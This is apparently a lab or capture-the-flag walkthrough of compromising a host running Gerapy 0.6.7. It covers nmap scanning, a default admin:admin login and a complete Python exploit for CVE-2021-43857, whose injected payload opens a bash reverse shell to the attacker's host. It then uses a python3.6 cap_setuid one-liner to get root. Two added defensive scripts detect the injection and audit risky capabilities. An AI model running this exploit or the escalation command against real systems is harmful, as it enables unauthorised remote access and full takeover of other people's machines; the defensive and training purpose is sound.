Enumerate the machine's open ports.
nmap -p- --open -sS --min-rate 2000 -vvv -n -Pn 192.168.190.24 -oG Basicscan.txt
Open ports: 22 (ssh) and 80 (http)
nmap -p22,8000 -sCV 192.168.190.24 -oN Fullscan.txt
I went on to do reconnaissance of the web application running on port 80. With the whatweb tool I looked at the technologies the application runs on.
Once inside, I found a login panel titled GERAPY.
The Wappalyzer tool works like whatweb; its purpose is to show which technologies a website runs on.
I tried default credentials, in this case admin:admin, and was able to log in successfully.
Inspecting the site, I saw the version of the web application: "gerapy 0.6.7"
With the version in hand I searched Google for an existing exploit and found that it is vulnerable to authenticated Remote Command Execution.
I brought the exploit over to my attacking machine and passed it the required arguments so that it would run successfully.
python3 exploit.py -t 192.168.190.24 -p 8000 -L 192.168.45.233 -P 4444
NOTE: EXPLOIT FIXED UP FROM GITHUB.
#!/usr/bin/python3
import argparse
import json
import subprocess
import sys
import time

import pyfiglet
import requests

banner = pyfiglet.figlet_format("CVE-2021-43857")
print(banner)
print("Exploit for CVE-2021-43857")
print("For: Gerapy < 0.9.8")

login = "admin"  # CHANGE ME IF NEEDED
password = "admin"  # CHANGE ME IF NEEDED


class Exploit:
    def __init__(self, target_ip, target_port, localhost, localport):
        self.target_ip = target_ip
        self.target_port = target_port
        self.localhost = localhost
        self.localport = localport

    def exploitation(self):
        # Spider name carrying a backtick command substitution (the injection point)
        payload = (
            '{"spider":"`/bin/bash -c \'bash -i >& /dev/tcp/'
            + self.localhost
            + "/"
            + self.localport
            + " 0>&1\'`\"}"
        )

        # Login to the app (getting auth token)
        url = "http://" + self.target_ip + ":" + self.target_port
        r = requests.Session()
        print("[*] Resolving URL...")
        r1 = r.get(url)
        time.sleep(3)

        print("[*] Logging in to application...")
        r2 = r.post(
            url + "/api/user/auth",
            json={"username": login, "password": password},
            allow_redirects=True,
        )
        time.sleep(3)
        if r2.status_code == 200:
            print("[*] Login successful! Proceeding...")
        else:
            print("[*] Something went wrong!")
            sys.exit(1)

        # Create a header out of the auth token
        dict_auth = r2.json()
        token = dict_auth.get("token", "")
        if not token.strip():
            print("[!] Authentication token not found.")
            sys.exit(1)
        auth_token = {"Authorization": "Token " + token}

        # Get the project list
        print("[*] Getting the project list")
        r3 = r.get(url + "/api/project/index", headers=auth_token, allow_redirects=True)
        time.sleep(3)
        if r3.status_code != 200:
            print("[!] Something went wrong! Maybe the token is corrupted?")
            sys.exit(1)
        try:
            # Parse the project name from the JSON response
            project_list = r3.json()  # Convert response JSON to a Python object
            if not project_list:
                print("[!] No projects found in the response.")
                sys.exit(1)
            name = project_list[0].get("name")
            if not name:
                print("[!] The project does not have an associated name.")
                sys.exit(1)
            print("[*] Found project: " + name)
        except (IndexError, KeyError, json.JSONDecodeError) as e:
            print(f"[!] Error processing the project list: {e}")
            sys.exit(1)

        # Get project ID
        print("[*] Getting the ID of the project to build the URL")
        r4 = r.get(
            url + "/api/project/" + name + "/build",
            headers=auth_token,
            allow_redirects=True,
        )
        time.sleep(3)
        if r4.status_code != 200:
            print("[*] Something went wrong! I can't reach the found project!")
            sys.exit(1)
        try:
            project_details = r4.json()
            project_id = project_details.get("id")
            if not project_id:
                print("[!] Project ID not found in response.")
                sys.exit(1)
            print(f"[*] Found ID of the project: {project_id}")
        except (KeyError, json.JSONDecodeError) as e:
            print(f"[!] Error processing project details: {e}")
            sys.exit(1)

        # Netcat listener
        print("[*] Setting up a netcat listener")
        listener = subprocess.Popen(["nc", "-nvlp", self.localport])
        time.sleep(3)

        # Execute the payload
        print("[*] Executing reverse shell payload")
        print("[*] Watch out for shell! :)")
        r5 = r.post(
            url + "/api/project/" + str(project_id) + "/parse",
            data=payload,
            headers=auth_token,
            allow_redirects=True,
        )
        listener.wait()
        if r5.status_code == 200:
            print("[*] It worked!")
        else:
            print("[!] Something went wrong!")
            listener.terminate()


def get_args():
    parser = argparse.ArgumentParser(
        description="Gerapy < 0.9.8 Remote Code Execution (Authenticated)"
    )
    parser.add_argument("-t", "--target", dest="url", required=True, action="store")
    parser.add_argument("-p", "--port", dest="target_port", required=True, action="store")
    parser.add_argument("-L", "--lh", dest="localhost", required=True, action="store")
    parser.add_argument("-P", "--lp", dest="localport", required=True, action="store")
    args = parser.parse_args()
    return args


args = get_args()
target_ip = args.url
target_port = args.target_port
localhost = args.localhost
localport = args.localport
exp = Exploit(target_ip, target_port, localhost, localport)
exp.exploitation()
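The injection point in the exploit above is the "spider" field posted to the project parse endpoint, which the vulnerable Gerapy versions hand to a shell. The following is an added detection example, not code from the writeup or from Gerapy: it scans request bodies (as a reverse proxy or WAF might log them for that endpoint) and flags spider names containing shell metacharacters. The sample bodies are constructed.

```python
import json
import re
from typing import List, Optional, Tuple

# Shell metacharacters that have no business in a spider name. The vulnerable
# endpoint passes the value to a shell, which is what the backtick payload relies on.
SHELL_META = re.compile(r"\$\(|[`;|&<>$]")

# Constructed sample request bodies for POST /api/project/<id>/parse.
# Only the first one is a legitimate spider name.
SAMPLE_BODIES = [
    '{"spider": "quotes"}',
    '{"spider": "`id`"}',
    '{"spider": "$(id)"}',
    '{"spider": "quotes; id"}',
    "not json at all",
]


def check_parse_body(body: str) -> Optional[str]:
    """Return a finding if "spider" carries shell metacharacters,
    None if the body is benign, malformed, or not a parse request."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return None
    spider = data.get("spider") if isinstance(data, dict) else None
    if not isinstance(spider, str):
        return None
    m = SHELL_META.search(spider)
    if m is None:
        return None
    return "shell metacharacter %r in spider name %r" % (m.group(0), spider)


def scan_bodies(bodies: List[str]) -> List[Tuple[int, str]]:
    """Run the check over a batch of logged bodies; return (index, finding) pairs."""
    findings = []
    for i, body in enumerate(bodies):
        finding = check_parse_body(body)
        if finding:
            findings.append((i, finding))
    return findings


if __name__ == "__main__":
    for idx, finding in scan_bodies(SAMPLE_BODIES):
        print("body %d: %s" % (idx, finding))
```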
I was able to access the machine, so I moved on to enumerating it.
I managed to upload LinPEAS and run it; once the scan finished, it found a vulnerable path for privilege escalation.
What I found was a capability on Python 3.6.
getcap / -r 2>/dev/null # list capabilities
The following article showed me how to exploit that capability.
/usr/bin/python3.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
I became the root user.
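The capability finding above is the kind of thing an administrator can audit for before an attacker does. The following is an added example, not from the writeup or LinPEAS: it parses getcap -r output (both the older "path = caps" and newer "path caps" formats), keeps entries carrying identity-changing or permission-bypassing capabilities, and marks interpreters such as python3.6, for which such a capability is equivalent to a setuid-root shell. The sample getcap output is constructed.

```python
import re
import subprocess
from typing import List, Tuple

# Capabilities that let a binary change identity or bypass file permissions;
# on an interpreter they amount to a setuid-root shell (the python3.6 case above).
RISKY_CAPS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
              "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module"}
INTERPRETER = re.compile(r"/(python|perl|ruby|php|node)[0-9.]*$")

# Constructed sample of `getcap -r / 2>/dev/null` output, in both the older
# "path = caps" and the newer "path caps" libcap formats.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.6 = cap_setuid+ep
/usr/sbin/arping cap_net_raw=ep
/usr/local/bin/node cap_setuid,cap_net_bind_service=eip
"""

def parse_getcap(text: str) -> List[Tuple[str, List[str]]]:
    """Turn getcap output into (path, [capability names]) pairs."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        path, _, caps = line.strip().partition(" ")
        # Drop the "= " of the old format and the +ep/=ep/=eip flag suffix.
        names = [c.split("+")[0].split("=")[0] for c in caps.lstrip("= ").split(",")]
        entries.append((path, names))
    return entries

def risky_entries(text: str) -> List[Tuple[str, List[str], bool]]:
    """Entries carrying a risky capability: (path, risky caps, is_interpreter)."""
    found = []
    for path, names in parse_getcap(text):
        hits = sorted(RISKY_CAPS.intersection(names))
        if hits:
            found.append((path, hits, bool(INTERPRETER.search(path))))
    return found

if __name__ == "__main__":
    try:  # audit the live system when getcap exists, otherwise use the sample
        text = subprocess.run(["getcap", "-r", "/"], stdout=subprocess.PIPE,
                              stderr=subprocess.DEVNULL, text=True).stdout
    except FileNotFoundError:
        text = SAMPLE_GETCAP
    for path, caps, interp in risky_entries(text or SAMPLE_GETCAP):
        print("%-11s %s %s" % ("INTERPRETER" if interp else "binary", path, ",".join(caps)))
```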